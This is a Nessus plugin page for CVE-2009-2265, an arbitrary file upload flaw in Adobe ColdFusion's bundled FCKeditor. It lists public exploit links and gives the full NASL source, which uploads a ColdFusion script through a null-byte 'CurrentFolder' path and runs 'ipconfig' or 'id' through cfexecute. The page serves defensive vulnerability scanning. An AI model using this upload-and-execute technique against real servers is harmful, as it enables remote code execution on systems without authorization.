Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload - Nessus
High Plugin ID: 39790This page contains detailed information about the Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.
Plugin Overview
ID: 39790
Name: Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload
Filename: coldfusion_fckeditor_file_upload.nasl
Vulnerability Published: 2009-07-03
This Plugin Published: 2009-07-14
Last Modification Time: 2021-02-25
Plugin Version: 1.30
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies:
coldfusion_detect.nasl, os_fingerprint.nasl
Required KB Items [?]: installed_sw/ColdFusion
Vulnerability Information
Severity: High
Vulnerability Published: 2009-07-03
Patch Published: 2009-07-08
CVE [?]: CVE-2009-2265
CPE [?]: cpe:/a:adobe:coldfusion
Synopsis
The remote web server contains an application that is affected by an arbitrary file upload vulnerability.
Description
The version of Adobe ColdFusion running on the remote host is affected by an arbitrary file upload vulnerability. The installed version ships with a vulnerable version of an open source HTML text editor, FCKeditor, that fails to properly sanitize input passed to the 'CurrentFolder' parameter of the 'upload.cfm' script located under '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm'.
An attacker can leverage this issue to upload arbitrary files and execute commands on the remote system subject to the privileges of the web server user id.
Solution
Upgrade to version 8.0.1 if necessary and apply the patch referenced in the vendor advisory above.
Public Exploits
Target Network Port(s): 80, 8500
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, GitHub, Immunity Canvas, Core Impact)
Exploit Ease: Exploits are available
Here's the list of publicly known exploits and PoCs for verifying the Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload vulnerability:
- Metasploit: exploit/windows/http/coldfusion_fckeditor
[ColdFusion 8.0.1 Arbitrary File Upload and Execute] - Exploit-DB: exploits/cfm/webapps/16788.rb
[EDB-16788: ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)] - Exploit-DB: exploits/cfm/webapps/50057.py
[EDB-50057: Adobe ColdFusion 8 - Remote Command Execution (RCE)] - GitHub: https://github.com/0xkasra/CVE-2009-2265
[CVE-2009-2265: ColdFusion 8.0.1 - Arbitrary File Upload to RCE] - GitHub: https://github.com/3hydraking/CVE-2009-2265
[CVE-2009-2265] - GitHub: https://github.com/4n0nym0u5dk/CVE-2009-2265
[CVE-2009-2265] - GitHub: https://github.com/k4u5h41/CVE-2009-2265
[CVE-2009-2265] - GitHub: https://github.com/macosta-42/Exploit-Development
[CVE-2009-2265] - GitHub: https://github.com/persian64/CVE-2009-2265
[CVE-2009-2265: ColdFusion 8.0.1 - Arbitrary File Upload to RCE] - GitHub: https://github.com/0zvxr/CVE-2009-2265
[CVE-2009-2265: Cf8-upload.py | CVE-2009-2265] - GitHub: https://github.com/zaphoxx/zaphoxx-coldfusion
[CVE-2009-2265: Coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/] - Immunity Canvas: CANVAS
Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.
WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.
Risk Information
CVSS Score Source [?]: CVE-2009-2265
CVSS V2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:POC/RL:OF/RC:C
CVSS Base Score: | 10.0 (High) |
Impact Subscore: | 10.0 |
Exploitability Subscore: | 10.0 |
CVSS Temporal Score: | 7.8 (High) |
CVSS Environmental Score: | NA (None) |
Modified Impact Subscore: | NA |
Overall CVSS Score: | 7.8 (High) |
CVSS Base Score: | 8.8 (High) |
Impact Subscore: | 5.9 |
Exploitability Subscore: | 2.8 |
CVSS Temporal Score: | NA (None) |
CVSS Environmental Score: | NA (None) |
Modified Impact Subscore: | NA |
Overall CVSS Score: | 8.8 (High) |
Go back to menu.
Plugin Source
This is the coldfusion_fckeditor_file_upload.nasl nessus plugin source code. This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(39790);
script_version("1.30");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/02/25");
script_cve_id("CVE-2009-2265");
script_bugtraq_id(31812);
script_xref(name:"Secunia", value:"35747");
script_xref(name:"EDB-ID", value:"16788");
script_name(english:"Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload");
script_summary(english:"Tries to upload a file with ColdFusion code using FCKeditor.");
script_set_attribute( attribute:"synopsis", value:
"The remote web server contains an application that is affected by an
arbitrary file upload vulnerability.");
script_set_attribute( attribute:"description", value:
"The version of Adobe ColdFusion running on the remote host is
affected by an arbitrary file upload vulnerability. The installed
version ships with a vulnerable version of an open source HTML text
editor, FCKeditor, that fails to properly sanitize input passed to
the 'CurrentFolder' parameter of the 'upload.cfm' script located under
'/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm'.
An attacker can leverage this issue to upload arbitrary files and
execute commands on the remote system subject to the privileges of the
web server user id.");
script_set_attribute(attribute:"see_also", value:"http://ocert.org/advisories/ocert-2009-007.html");
script_set_attribute(attribute:"see_also",value:"https://www.adobe.com/support/security/bulletins/apsb09-09.html");
script_set_attribute( attribute:"solution", value:
"Upgrade to version 8.0.1 if necessary and apply the patch referenced
in the vendor advisory above.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2009-2265");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'ColdFusion 8.0.1 Arbitrary File Upload and Execute');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_cwe_id(22);
script_set_attribute(attribute:"vuln_publication_date", value:"2009/07/03");
script_set_attribute(attribute:"patch_publication_date", value:"2009/07/08");
script_set_attribute(attribute:"plugin_publication_date", value:"2009/07/14");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:adobe:coldfusion");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_MIXED_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("coldfusion_detect.nasl", "os_fingerprint.nasl");
script_require_ports("Services/www", 80, 8500);
script_require_keys("installed_sw/ColdFusion");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
app = 'ColdFusion';
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:80);
install = get_single_install(
app_name : app,
port : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);
# key = command, value = arguments
cmds = make_array();
cmd_desc = make_array();
cmd_pats = make_array();
os = get_kb_item("Host/OS");
# decides which commands to run based on OS
# Windows (or unknown)
if (isnull(os) || 'Windows' >< os)
{
cmds['cmd'] = '/c ipconfig /all';
cmd_desc['cmd'] = 'ipconfig /all';
cmd_pats['cmd'] = 'Windows IP Configuration|(Subnet Mask|IP(v(4|6))? Address)[\\. ]*:';
}
# *nix (or unknown)
if (isnull(os) || 'Windows' >!< os)
{
cmds['sh'] = '-c id';
cmd_desc['sh'] = 'id';
cmd_pats['sh'] = 'uid=[0-9]+.*gid=[0-9]+.*';
}
path = "/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm";
folder_name = str_replace(
find:".nasl",
replace:"-"+unixtime()+".cfm",
string:SCRIPT_NAME
);
if(safe_checks())
{
url =
path + "/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/" +
folder_name + "%0d";
res = http_send_recv3(port:port, method:"GET", item:dir+url, exit_on_fail: TRUE);
# If it does and is not disabled...
if (
"OnUploadCompleted" >< res[2] &&
"file uploader is disabled" >!< res[2]
)
{
# Try to upload a file.
bound = "nessus";
boundary = "--" +bound;
postdata =
boundary + '\r\n' +
# nb: the filename specified here is irrelevant.
'content-disposition: form-data; name="newfile"; filename="nessus.txt"\r\n'+
'content-type: text/plain\r\n' +
'\r\n' +
'<!-- test script created by ' + SCRIPT_NAME + '. -->\r\n' +
boundary + "--"+ "\r\n";
res = http_send_recv3(
method : "POST",
port : port,
item : dir + url,
data : postdata,
add_headers : make_array(
"Content-Type", "multipart/form-data; boundary="+bound),
exit_on_fail : TRUE
);
if(
"An exception occurred when performing a file operation copy" >< res[2]
&&
folder_name + '\\r' >< res[2]
)
{
if (report_verbosity > 1)
{
report =
'\n' +
'The remote ColdFusion install responded with the following error, while trying to upload a file : ' +
res[2] + '\n\n' +
'Note that Nessus reported this issue only based on the error message because \n' +
'safe checks were enabled for this scan.\n';
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
}
}
else
{
timeout = get_read_timeout();
http_set_read_timeout(timeout * 2);
url =
path + "/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/" +
folder_name + "%00";
res = http_send_recv3(port:port, method:"GET", item:dir+url, exit_on_fail: TRUE);
# If it does and is not disabled...
if (
"OnUploadCompleted" >< res[2] &&
"file uploader is disabled" >!< res[2]
)
{
# Try to upload a file to run a command.
bound = "nessus";
boundary = "--" + bound;
try_again = 0;
foreach cmd (keys(cmds))
{
postdata =
boundary + '\r\n' +
# nb: the filename specified here is irrelevant.
'content-disposition: form-data; name="newfile"; filename="nessus.txt"\r\n' +
'content-type: text/plain\r\n' +
'\r\n' +
# nb: this script executes a command, stores the output in a variable,
# and returns it to the user.
'<cfsetting enablecfoutputonly="yes" showdebugoutput="no">\r\n' +
'\r\n' +
'<!-- test script created by '+ SCRIPT_NAME + '. -->\r\n' +
'\r\n' +
'<cfexecute name="' + cmd + '" arguments="' +cmds[cmd] + '" timeout="'+
timeout + '" variable="nessus"/>\r\n' +
'<cfoutput>#nessus#</cfoutput>\r\n' +
boundary + '--\r\n';
# Increment 'folder_name' in URL and in the set variable so that each
# attempt will upload a unique file, otherwise exploit try to upload a
# file that already exists and would then fail
if (try_again > 0)
{
orig_url = url;
orig_folder = folder_name;
time = unixtime() + try_again;
url = ereg_replace(pattern:"-([0-9]+)\.cfm", replace:'-'+time+".cfm", string:url);
folder_name = ereg_replace(pattern:"-([0-9]+)\.cfm", replace:'-'+time+".cfm", string:folder_name);
# Just in case, revert to original values
if (empty_or_null(url)) url = orig_url;
if (empty_or_null(folder_name)) folder_name = orig_folder;
}
res = http_send_recv3(
method : "POST",
port : port,
item : dir + url,
data : postdata,
add_headers : make_array(
"Content-Type", "multipart/form-data; boundary="+bound),
exit_on_fail : TRUE
);
attack_req = http_last_sent_request();
# Figure out the location of the script to request for code execution
pat = 'OnUploadCompleted\\( *0, *"([^"]+/' + folder_name + ')';
foreach line (split(res[2], keep:FALSE))
{
matches = pregmatch(pattern:pat, string:line);
if (matches) url2 = matches[1];
}
if (isnull(url2)) exit(1, "Nessus was unable to extract the URL for the file uploaded to the "+app+" install at "+install_url);
# Now try to execute the script.
res = http_send_recv3(port:port, method:"GET", item:url2, exit_on_fail: TRUE);
if(egrep(pattern:cmd_pats[cmd], string:res[2]))
{
if ("ipconfig" >< cmd_desc[cmd]) line_limit = 10;
else line_limit = 4;
security_report_v4(
port : port,
severity : SECURITY_HOLE,
cmd : cmd_desc[cmd],
line_limit : line_limit,
request : make_list(attack_req, (install_url - dir)+url2),
output : chomp(res[2]),
rep_extra : '\nNote: This file has not been removed by Nessus'+
' and will need to be\nmanually deleted.'
);
exit(0);
}
try_again++;
}
}
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
The latest version of this script can be found in these locations depending on your platform:
- Linux / Unix:
/opt/nessus/lib/nessus/plugins/coldfusion_fckeditor_file_upload.nasl
- Windows:
C:\ProgramData\Tenable\Nessus\nessus\plugins\coldfusion_fckeditor_file_upload.nasl
- Mac OS X:
/Library/Nessus/run/lib/nessus/plugins/coldfusion_fckeditor_file_upload.nasl
Go back to menu.
How to Run
Here is how to run the Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload as a standalone plugin via the Nessus web user interface (https://localhost:8834/):
- Click to start a New Scan.
- Select Advanced Scan.
- Navigate to the Plugins tab.
- On the top right corner click to Disable All plugins.
- On the left side table select CGI abuses plugin family.
- On the right side table select Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload plugin ID 39790.
- Specify the target on the Settings tab and click to Save the scan.
- Run the scan.
Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.
Basic usage:
/opt/nessus/bin/nasl coldfusion_fckeditor_file_upload.nasl -t <IP/HOST>
Run the plugin with audit trail message on the console:
/opt/nessus/bin/nasl -a coldfusion_fckeditor_file_upload.nasl -t <IP/HOST>
Run the plugin with trace script execution written to the console (useful for debugging):
/opt/nessus/bin/nasl -T - coldfusion_fckeditor_file_upload.nasl -t <IP/HOST>
Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):
/opt/nessus/bin/nasl -K /tmp/state coldfusion_fckeditor_file_upload.nasl -t <IP/HOST>
Go back to menu.
References
BID | SecurityFocus Bugtraq ID: Secunia Advisory: CWE | Common Weakness Enumeration:
- CWE-22 (Weakness) Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
- https://www.tenable.com/plugins/nessus/39790
- https://www.adobe.com/support/security/bulletins/apsb09-09.html
- http://ocert.org/advisories/ocert-2009-007.html
- https://vulners.com/nessus/COLDFUSION_FCKEDITOR_FILE_UPLOAD.NASL
- 44701 - Debian DSA-1836-1 : fckeditor - missing input sanitising
- 39806 - FCKeditor 'CurrentFolder' Arbitrary File Upload
- 39862 - Fedora 10 : moin-1.6.4-3.fc10 (2009-7761)
- 39866 - Fedora 10 : wxGTK-2.8.10-2.fc10 / Fedora 11 : moin-1.8.4-2.fc11 (2009-7794)
- 99731 - Adobe ColdFusion BlazeDS Java Object Deserialization RCE
- 66404 - Adobe ColdFusion Multiple Vulnerabilities (APSA13-03)
- 64689 - Adobe ColdFusion Authentication Bypass (APSB13-03)
- 66408 - Adobe ColdFusion Authentication Bypass (APSB13-13) (intrusive check)
- 130263 - Adobe ColdFusion File Upload (APSB18-33) (CVE-2018-15961)
- 48340 - Adobe ColdFusion 'locale' Parameter Directory Traversal
- 42340 - Adobe ColdFusion <= 8.0.1 _logintowizard.cfm XSS
- 66526 - Adobe ColdFusion Multiple Vulnerabilities (APSB13-03) (credentialed check)
- 82780 - Adobe ColdFusion Unspecified XSS (APSB15-07) (credentialed check)
- 93245 - Adobe ColdFusion XML External Entity (XXE) Injection Information Disclosure (APSB16-30)
- 99669 - Adobe ColdFusion 10.x < 10u23 / 11.x < 11u12 / 2016.x < 2016u4 Multiple Vulnerabilities (APSB17-14)
- 103194 - Adobe ColdFusion 11.x < 11u13 / 2016.x < 2016u5 Multiple Vulnerabilities (APSB17-30)
- 109017 - Adobe ColdFusion 11.x < 11u14 / 2016.x < 2016u6 Multiple Vulnerabilities (APSB18-14)
- 117480 - Adobe ColdFusion 11.x < 11u15 / 2016.x < 2016u7 / 2018.x < 2018u1 Multiple Vulnerabilities (APSB18-33)
- 125880 - Adobe ColdFusion < 11.x < 11u19 / 2016.x < 2016u11 / 2018.x < 2018u4 Multiple Vulnerabilities (APSB19-27)
- 148039 - Adobe ColdFusion 2016.x < 2016u17 / 2018.x < 2018u11 / 2021.x < 2021u1 Improper Input Validation RCE (APSB21-16)
- 24278 - ColdFusion Web Server User-Agent HTTP Header Error Message XSS
- 65127 - Adobe InDesign Server RunScript Arbitrary Command Execution
- 41947 - Adobe RoboHelp Server Security Bypass (APSA09-05 / intrusive check)
- 41946 - Adobe RoboHelp Server Security Bypass (APSA09-05)
Version
This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file coldfusion_fckeditor_file_upload.nasl version 1.30. For more plugins, visit the Nessus Plugin Library.
Go back to menu.